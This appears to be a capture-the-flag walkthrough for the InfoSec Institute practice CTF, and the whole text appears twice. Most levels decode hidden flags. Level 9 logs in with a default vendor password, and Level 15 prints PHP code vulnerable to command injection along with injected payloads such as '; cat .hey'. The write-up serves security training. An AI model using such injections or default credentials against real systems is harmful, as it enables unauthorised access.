haykuro · April 8, 2025 11:33 · Eileenioi · Aug 14, 2021
diff --git a/CTF_Solutions.txt b/CTF_Solutions.txt
 http://ctf.infosecinstitute.com/

 ## Level 1:

 View the source, at the top we see:

 <!-- infosec_flagis_welcome -->

 Level 1 PASS: infosec_flagis_welcome

 ## Level 2:

 We have a broken image at: http://ctf.infosecinstitute.com/img/leveltwo.jpeg

 $ curl -s http://ctf.infosecinstitute.com/img/leveltwo.jpeg
 aW5mb3NlY19mbGFnaXNfd2VhcmVqdXN0c3RhcnRpbmc=

 $ curl -s http://ctf.infosecinstitute.com/img/leveltwo.jpeg | base64 -D
 infosec_flagis_wearejuststarting

 Level 2 PASS: infosec_flagis_wearejuststarting

 ====

 ## Level 3:

 We decode the QR code using an online service:

 http://zxing.org/w/decode?u=http%3A%2F%2Fctf.infosecinstitute.com%2Fimg%2Fqrcode.png

 Output:

 .. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... .. -. --.

 This looks like morse code.

 We resolve it to: INFOSECFLAGISMORSING

 Level 3 PASS: INFOSECFLAGISMORSING

 ## Level 4:

 We land on the page and see cookie monster tell us HTTP stands for "Hyper Text Transfer Protocol."

 Well, part of the protocol is cookie monster's favorite: COOKIES!

 We see:

 $ GET http://ctf.infosecinstitute.com/levelfour.php
 GET /levelfour.php HTTP/1.1
 Accept: */*
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Host: ctf.infosecinstitute.com

 HTTP/1.1 200 OK
 Connection: Keep-Alive
 Content-Encoding: gzip
 Content-Length: 1235
 Content-Type: text/html
 Date: Thu, 12 Mar 2015 21:42:25 GMT
 Keep-Alive: timeout=5, max=100
 Server: Apache/2.4.7 (Ubuntu)
 Set-Cookie: fusrodah=vasbfrp_syntvf_jrybirpbbxvrf
 Vary: Accept-Encoding
 X-Powered-By: PHP/5.5.9-1ubuntu4.6

 fusrodah is a reference to a DBZ meme, look it up.

 The text "vasbfrp_syntvf_jrybirpbbxvrf" is the password crypted using rot13.

 Level 4 PASS: infosec_flagis_welovecookies
 ===

 Level 5:

 There's an infinite loop forcing an alert box that reads "hacker."

 Most modern browsers will allow you to "prevent further pop-ups", but alternatively you can download the page using an external tool (such as wget or curl)

 $ wget -o levelfive.html http://ctf.infosecinstitute.com/levelfive.php

 ANOTHER option is to type into your browser: "view-source:http://ctf.infosecinstitute.com/levelfive.php" and you should see the source.

 We see:
 	<script>
 	for(;;){
 	alert('Hacker!!!');
 	}
 	</script>
 	
 	<img src="img/aliens.jpg" /> <br /> <br />

 I tried to run  "strings" on the image but nothing significant came up..

 $ curl -s http://ctf.infosecinstitute.com/img/aliens.jpg | strings | head -n 512
 JFIF
 $3br
 %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
 &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
 }/p2
 E(5mN
 >0x:
 k0h^,
 5}.-V
 W'k]
 3Meo4
 vq]i
 _MkIti
 pFON95
 Ul3D
 ko0nE
 ...

 So, we can run a Steg tool like "Steghide" (https://futureboy.us/stegano/decinput.html) to try to see if there's any readily available text in the file.

 We get back:

 01101001011011100110011001101111011100110110010101100011010111110110011001101100011000010110011101101001011100110101111101110011011101000110010101100111011000010110110001101001011001010110111001110011

 $ perl -e '$bin="01101001011011100110011001101111011100110110010101100011010111110110011001101100011000010110011101101001011100110101111101110011011101000110010101100111011000010110110001101001011001010110111001110011"; $len=length($bin); print pack("B$len", $bin);'
 infosec_flagis_stegaliens

 Level 5 PASS: infosec_flagis_stegaliens

 ===

 Level 6:

 We download sharkfin.pcap.

 $ tcpdump -qns 0 -X -r sharkfin.pcap | head
 reading from file sharkfin.pcap, link-type EN10MB (Ethernet)
 14:59:54.303760 IP 127.0.0.1.32769 > 127.0.0.1.139: UDP, length 44
 	0x0000:  4500 0048 0000 4000 4011 3ca3 7f00 0001  E..H..@.@.<.....
 	0x0010:  7f00 0001 8001 008b 0034 0000 3639 3665  .........4..696e
 	0x0020:  3636 3666 3733 3635 3633 3566 3636 3663  666f7365635f666c
 	0x0030:  3631 3637 3639 3733 3566 3733 3665 3639  616769735f736e69
 	0x0040:  3636 3636 3635 3634                      66666564
 15:10:33.563340 IP 192.168.1.103.2925 > 133.242.147.91.80: tcp 0
 	0x0000:  4500 0028 1acb 4000 8006 04a8 c0a8 0167  E..([email protected]
 	0x0010:  85f2 935b 0b6d 0050 bbf2 588c 6f42 6144  ...[.m.P..X.oBaD
 	0x0020:  5011 1006 d3ad 0000                      P.......

 Quickly browsing around I notice,

 696e666f7365635f666c616769735f736e6966666564 is hex encoded: infosec_flagis_sniffed

 Level 6 PASS: infosec_flagis_sniffed

 ===

 Level 7:

 $ curl --HEAD http://ctf.infosecinstitute.com/404.php
 HTTP/1.0 404 Not Found
 Date: Thu, 12 Mar 2015 22:03:58 GMT
 Server: Apache/2.4.7 (Ubuntu)
 X-Powered-By: PHP/5.5.9-1ubuntu4.6
 Connection: close
 Content-Type: text/html

 $ curl --HEAD http://ctf.infosecinstitute.com/levelseven.php
 HTTP/1.0 200 aW5mb3NlY19mbGFnaXNfeW91Zm91bmRpdA==
 Date: Thu, 12 Mar 2015 22:04:04 GMT
 Server: Apache/2.4.7 (Ubuntu)
 X-Powered-By: PHP/5.5.9-1ubuntu4.6
 Connection: close
 Content-Type: text/html

 $ echo -n "aW5mb3NlY19mbGFnaXNfeW91Zm91bmRpdA==" | base64 -D
 infosec_flagis_youfoundit

 Level 7 PASS: infosec_flagis_youfoundit

 ===

 Level 8:

 Because I'm on a Mac I solved this first without even opening the app:

 $ strings app.exe| ack -i infosec_flag
 infosec_flagis_0x1a

 BUT, to do what's right, I booted a virtual machine to debug the app and make sure!

 See Dump here: http://i.imgur.com/CcqudvC.png

 Level 8 PASS: infosec_flagis_0x1a

 ===

 Level 9:

 We load the page and see a "CISCO IDS Login"

 Look up default logins for any CISCO IDS router, we see: "root/attack"

 Type it in, we get an alert "ssaptluafed_sigalf_cesofni"

 $ echo -n "ssaptluafed_sigalf_cesofni" | rev
 infosec_flagis_defaultpass

 Level 9 PASS: infosec_flagis_defaultpass

 ===

 Level 11:

 $ curl -s http://ctf.infosecinstitute.com/img/php-logo-virus.jpg | strings | grep infosec_flag
 infosec_flagis_aHR0cDovL3d3dy5yb2xsZXJza2kuY28udWsvaW1hZ2VzYi9wb3dlcnNsaWRlX2xvZ29fbGFyZ2UuZ2lm

 Level 11 PASS: infosec_flagis_http://www.rollerski.co.uk/imagesb/powerslide_logo_large.gif

 ===

 Level 12:

 View source, we see "http://ctf.infosecinstitute.com/css/design.css" is being imported now.

 $ curl -s http://ctf.infosecinstitute.com/css/design.css
 .thisloveis{
 	color: #696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72;
 }

 696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72 is hex for infosec_flagis_heyimnotacolor

 Level 12 PASS: infosec_flagis_heyimnotacolor

 ===

 Level 13:

 After fuzzing the URL we find: http://ctf.infosecinstitute.com/levelthirteen.php.old

 This file contains:

 <?php

    /* <img src="img/clippy1.jpg" class="imahe" /> <br /> <br />

    <p>Do you want to download this mysterious file?</p>

    <a href="misc/imadecoy">
      <button class="btn">Yes</button>
    </a>

    <a href="index.php">
      <button class="btn">No</button>
    </a>
    */

    ?>
  </div>
  
 So, we get the file and check it..

 $ wget http://ctf.infosecinstitute.com/misc/imadecoy
 ..
 $ file imadecoy
 imadecoy: tcpdump capture file (little-endian) - version 2.4 (Linux "cooked", capture length 65535)

 So let's open the dump in Wireshark.

 We see a user requests a file "/honeypy/img/HoneyPY.PNG"

 View / Dump the image, and we get a png: "infosec_flagis_morepackets"

 ===

 Level 14:

 We download a file, http://ctf.infosecinstitute.com/misc/level14.

 The file contains SQL data.

 We notice a table "flag?" which has some hashed password.

 Attempted to crack using JTR (John the Ripper) to no avail.

 Check other tables and find significant value "\u0069\u006e\u0066\u006f\u0073\u0065\u0063\u005f\u0066\u006c\u0061\u0067\u0069\u0073\u005f\u0077\u0068\u0061\u0074\u0073\u006f\u0072\u0063\u0065\u0072\u0079\u0069\u0073\u0074\u0068\u0069\u0073" under "name" column in "friends" table.

 Replace \u00 with \x and parse..

 \x69\x6e\x66\x6f\x73\x65\x63\x5f\x66\x6c\x61\x67\x69\x73\x5f\x77\x68\x61\x74\x73\x6f\x72\x63\x65\x72\x79\x69\x73\x74\x68\x69\x73

 Then pass through:

 $ python -c 'print "\x69\x6e\x66\x6f\x73\x65\x63\x5f\x66\x6c\x61\x67\x69\x73\x5f\x77\x68\x61\x74\x73\x6f\x72\x63\x65\x72\x79\x69\x73\x74\x68\x69\x73"'
 infosec_flagis_whatsorceryisthis

 Level 14 PASS: infosec_flagis_whatsorceryisthis

 ===

 Level 15:

 http://ctf.infosecinstitute.com/levelfifteen/index.php

 If we enter "; <cmd>" we can execute multiple commands.

 Example:
    ; cat index.php
    
 This gives us the source of index.php, where we see:

 <?php
        if(isset($_POST['dig'])){
        echo "<pre>";
        $cmd = ($_POST['dig']);
        system("dig mx " . $cmd );
        echo "</pre>";
        die;
        }   
      ?>
      
 GREAT!

 now if we do:
    ; ls -lah
    
 we see:

 total 16K
 drwxrwxr-x 2 ubuntu ubuntu 4.0K Mar  3 18:50 .
 drwxr-xr-x 7 ubuntu ubuntu 4.0K Mar  4 22:14 ..
 -rw-rw-r-- 1 ubuntu ubuntu   37 Mar  6 20:27 .hey
 -rw-rw-r-- 1 ubuntu ubuntu 3.8K Mar  6 20:27 index.php

 so we do:
    ; cat .hey
    
 we get:

 Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC

 We can decrypt this hash using an ATOM-128 Decypter tool found here: http://crypto.x-usenext.net/eng_atom128d.php

 We get: infosec_flagis_rceatomized

 [.. TODO: FINISH Level 10! ..]
	http://ctf.infosecinstitute.com/

	## Level 1:

	View the source, at the top we see:

	<!-- infosec_flagis_welcome -->

	Level 1 PASS: infosec_flagis_welcome

	## Level 2:

	We have a broken image at: http://ctf.infosecinstitute.com/img/leveltwo.jpeg

	$ curl -s http://ctf.infosecinstitute.com/img/leveltwo.jpeg
	aW5mb3NlY19mbGFnaXNfd2VhcmVqdXN0c3RhcnRpbmc=

	$ curl -s http://ctf.infosecinstitute.com/img/leveltwo.jpeg \| base64 -D
	infosec_flagis_wearejuststarting

	Level 2 PASS: infosec_flagis_wearejuststarting

	====

	## Level 3:

	We decode the QR code using an online service:

	http://zxing.org/w/decode?u=http%3A%2F%2Fctf.infosecinstitute.com%2Fimg%2Fqrcode.png

	Output:

	.. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... .. -. --.

	This looks like morse code.

	We resolve it to: INFOSECFLAGISMORSING

	Level 3 PASS: INFOSECFLAGISMORSING

	## Level 4:

	We land on the page and see cookie monster tell us HTTP stands for "Hyper Text Transfer Protocol."

	Well, part of the protocol is cookie monster's favorite: COOKIES!

	We see:

	$ GET http://ctf.infosecinstitute.com/levelfour.php
	GET /levelfour.php HTTP/1.1
	Accept: /
	Accept-Encoding: gzip, deflate
	Connection: keep-alive
	Host: ctf.infosecinstitute.com

	HTTP/1.1 200 OK
	Connection: Keep-Alive
	Content-Encoding: gzip
	Content-Length: 1235
	Content-Type: text/html
	Date: Thu, 12 Mar 2015 21:42:25 GMT
	Keep-Alive: timeout=5, max=100
	Server: Apache/2.4.7 (Ubuntu)
	Set-Cookie: fusrodah=vasbfrp_syntvf_jrybirpbbxvrf
	Vary: Accept-Encoding
	X-Powered-By: PHP/5.5.9-1ubuntu4.6

	fusrodah is a reference to a DBZ meme, look it up.

	The text "vasbfrp_syntvf_jrybirpbbxvrf" is the password crypted using rot13.

	Level 4 PASS: infosec_flagis_welovecookies
	===

	Level 5:

	There's an infinite loop forcing an alert box that reads "hacker."

	Most modern browsers will allow you to "prevent further pop-ups", but alternatively you can download the page using an external tool (such as wget or curl)

	$ wget -o levelfive.html http://ctf.infosecinstitute.com/levelfive.php

	ANOTHER option is to type into your browser: "view-source:http://ctf.infosecinstitute.com/levelfive.php" and you should see the source.

	We see:
	<script>
	for(;;){
	alert('Hacker!!!');
	}
	</script>

	<img src="img/aliens.jpg" /> <br /> <br />

	I tried to run "strings" on the image but nothing significant came up..

	$ curl -s http://ctf.infosecinstitute.com/img/aliens.jpg \| strings \| head -n 512
	JFIF
	$3br
	%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
	&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
	}/p2
	E(5mN
	>0x:
	k0h^,
	5}.-V
	W'k]
	3Meo4
	vq]i
	_MkIti
	pFON95
	Ul3D
	ko0nE
	...

	So, we can run a Steg tool like "Steghide" (https://futureboy.us/stegano/decinput.html) to try to see if there's any readily available text in the file.

	We get back:

	01101001011011100110011001101111011100110110010101100011010111110110011001101100011000010110011101101001011100110101111101110011011101000110010101100111011000010110110001101001011001010110111001110011

	$ perl -e '$bin="01101001011011100110011001101111011100110110010101100011010111110110011001101100011000010110011101101001011100110101111101110011011101000110010101100111011000010110110001101001011001010110111001110011"; $len=length($bin); print pack("B$len", $bin);'
	infosec_flagis_stegaliens

	Level 5 PASS: infosec_flagis_stegaliens

	===

	Level 6:

	We download sharkfin.pcap.

	$ tcpdump -qns 0 -X -r sharkfin.pcap \| head
	reading from file sharkfin.pcap, link-type EN10MB (Ethernet)
	14:59:54.303760 IP 127.0.0.1.32769 > 127.0.0.1.139: UDP, length 44
	0x0000: 4500 0048 0000 4000 4011 3ca3 7f00 0001 E..H..@.@.<.....
	0x0010: 7f00 0001 8001 008b 0034 0000 3639 3665 .........4..696e
	0x0020: 3636 3666 3733 3635 3633 3566 3636 3663 666f7365635f666c
	0x0030: 3631 3637 3639 3733 3566 3733 3665 3639 616769735f736e69
	0x0040: 3636 3636 3635 3634 66666564
	15:10:33.563340 IP 192.168.1.103.2925 > 133.242.147.91.80: tcp 0
	0x0000: 4500 0028 1acb 4000 8006 04a8 c0a8 0167 E..([email protected]
	0x0010: 85f2 935b 0b6d 0050 bbf2 588c 6f42 6144 ...[.m.P..X.oBaD
	0x0020: 5011 1006 d3ad 0000 P.......

	Quickly browsing around I notice,

	696e666f7365635f666c616769735f736e6966666564 is hex encoded: infosec_flagis_sniffed

	Level 6 PASS: infosec_flagis_sniffed

	===

	Level 7:

	$ curl --HEAD http://ctf.infosecinstitute.com/404.php
	HTTP/1.0 404 Not Found
	Date: Thu, 12 Mar 2015 22:03:58 GMT
	Server: Apache/2.4.7 (Ubuntu)
	X-Powered-By: PHP/5.5.9-1ubuntu4.6
	Connection: close
	Content-Type: text/html

	$ curl --HEAD http://ctf.infosecinstitute.com/levelseven.php
	HTTP/1.0 200 aW5mb3NlY19mbGFnaXNfeW91Zm91bmRpdA==
	Date: Thu, 12 Mar 2015 22:04:04 GMT
	Server: Apache/2.4.7 (Ubuntu)
	X-Powered-By: PHP/5.5.9-1ubuntu4.6
	Connection: close
	Content-Type: text/html

	$ echo -n "aW5mb3NlY19mbGFnaXNfeW91Zm91bmRpdA==" \| base64 -D
	infosec_flagis_youfoundit

	Level 7 PASS: infosec_flagis_youfoundit

	===

	Level 8:

	Because I'm on a Mac I solved this first without even opening the app:

	$ strings app.exe\| ack -i infosec_flag
	infosec_flagis_0x1a

	BUT, to do what's right, I booted a virtual machine to debug the app and make sure!

	See Dump here: http://i.imgur.com/CcqudvC.png

	Level 8 PASS: infosec_flagis_0x1a

	===

	Level 9:

	We load the page and see a "CISCO IDS Login"

	Look up default logins for any CISCO IDS router, we see: "root/attack"

	Type it in, we get an alert "ssaptluafed_sigalf_cesofni"

	$ echo -n "ssaptluafed_sigalf_cesofni" \| rev
	infosec_flagis_defaultpass

	Level 9 PASS: infosec_flagis_defaultpass

	===

	Level 11:

	$ curl -s http://ctf.infosecinstitute.com/img/php-logo-virus.jpg \| strings \| grep infosec_flag
	infosec_flagis_aHR0cDovL3d3dy5yb2xsZXJza2kuY28udWsvaW1hZ2VzYi9wb3dlcnNsaWRlX2xvZ29fbGFyZ2UuZ2lm

	Level 11 PASS: infosec_flagis_http://www.rollerski.co.uk/imagesb/powerslide_logo_large.gif

	===

	Level 12:

	View source, we see "http://ctf.infosecinstitute.com/css/design.css" is being imported now.

	$ curl -s http://ctf.infosecinstitute.com/css/design.css
	.thisloveis{
	color: #696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72;
	}

	696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72 is hex for infosec_flagis_heyimnotacolor

	Level 12 PASS: infosec_flagis_heyimnotacolor

	===

	Level 13:

	After fuzzing the URL we find: http://ctf.infosecinstitute.com/levelthirteen.php.old

	This file contains:

	<?php

	/* <img src="img/clippy1.jpg" class="imahe" /> <br /> <br />

	<p>Do you want to download this mysterious file?</p>

	<a href="misc/imadecoy">
	<button class="btn">Yes</button>
	</a>

	<a href="index.php">
	<button class="btn">No</button>
	</a>
	*/

	?>
	</div>

	So, we get the file and check it..

	$ wget http://ctf.infosecinstitute.com/misc/imadecoy
	..
	$ file imadecoy
	imadecoy: tcpdump capture file (little-endian) - version 2.4 (Linux "cooked", capture length 65535)

	So let's open the dump in Wireshark.

	We see a user requests a file "/honeypy/img/HoneyPY.PNG"

	View / Dump the image, and we get a png: "infosec_flagis_morepackets"

	===

	Level 14:

	We download a file, http://ctf.infosecinstitute.com/misc/level14.

	The file contains SQL data.

	We notice a table "flag?" which has some hashed password.

	Attempted to crack using JTR (John the Ripper) to no avail.

	Check other tables and find significant value "\u0069\u006e\u0066\u006f\u0073\u0065\u0063\u005f\u0066\u006c\u0061\u0067\u0069\u0073\u005f\u0077\u0068\u0061\u0074\u0073\u006f\u0072\u0063\u0065\u0072\u0079\u0069\u0073\u0074\u0068\u0069\u0073" under "name" column in "friends" table.

	Replace \u00 with \x and parse..

	\x69\x6e\x66\x6f\x73\x65\x63\x5f\x66\x6c\x61\x67\x69\x73\x5f\x77\x68\x61\x74\x73\x6f\x72\x63\x65\x72\x79\x69\x73\x74\x68\x69\x73

	Then pass through:

	$ python -c 'print "\x69\x6e\x66\x6f\x73\x65\x63\x5f\x66\x6c\x61\x67\x69\x73\x5f\x77\x68\x61\x74\x73\x6f\x72\x63\x65\x72\x79\x69\x73\x74\x68\x69\x73"'
	infosec_flagis_whatsorceryisthis

	Level 14 PASS: infosec_flagis_whatsorceryisthis

	===

	Level 15:

	http://ctf.infosecinstitute.com/levelfifteen/index.php

	If we enter "; <cmd>" we can execute multiple commands.

	Example:
	; cat index.php

	This gives us the source of index.php, where we see:

	<?php
	if(isset($_POST['dig'])){
	echo "<pre>";
	$cmd = ($_POST['dig']);
	system("dig mx " . $cmd );
	echo "</pre>";
	die;
	}
	?>

	GREAT!

	now if we do:
	; ls -lah

	we see:

	total 16K
	drwxrwxr-x 2 ubuntu ubuntu 4.0K Mar 3 18:50 .
	drwxr-xr-x 7 ubuntu ubuntu 4.0K Mar 4 22:14 ..
	-rw-rw-r-- 1 ubuntu ubuntu 37 Mar 6 20:27 .hey
	-rw-rw-r-- 1 ubuntu ubuntu 3.8K Mar 6 20:27 index.php

	so we do:
	; cat .hey

	we get:

	Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC

	We can decrypt this hash using an ATOM-128 Decypter tool found here: http://crypto.x-usenext.net/eng_atom128d.php

	We get: infosec_flagis_rceatomized

	[.. TODO: FINISH Level 10! ..]